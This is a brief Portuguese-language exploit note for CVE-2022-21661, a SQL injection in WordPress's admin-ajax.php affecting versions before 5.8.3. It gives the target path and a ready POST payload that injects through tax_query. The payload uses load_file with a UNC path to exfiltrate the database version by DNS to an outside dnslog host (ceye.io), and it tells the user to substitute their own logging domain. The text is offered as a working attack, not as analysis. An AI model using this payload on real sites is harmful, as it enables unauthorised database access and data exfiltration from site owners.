
Exploit para a vulnerabilidade de injeção SQL CVE-2022-21661 no WordPress em admin-ajax.php, usando exfiltração de dados fora da banda via DNS para versões anteriores a 5.8.3.
#versão<5.8.3
caminho: http://your target/wp-admin/admin-ajax.php
O tipo de injeção é out-of-band, você precisa especificar o dnslog você mesmo e substituir ceye.io
POST- DADOS:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}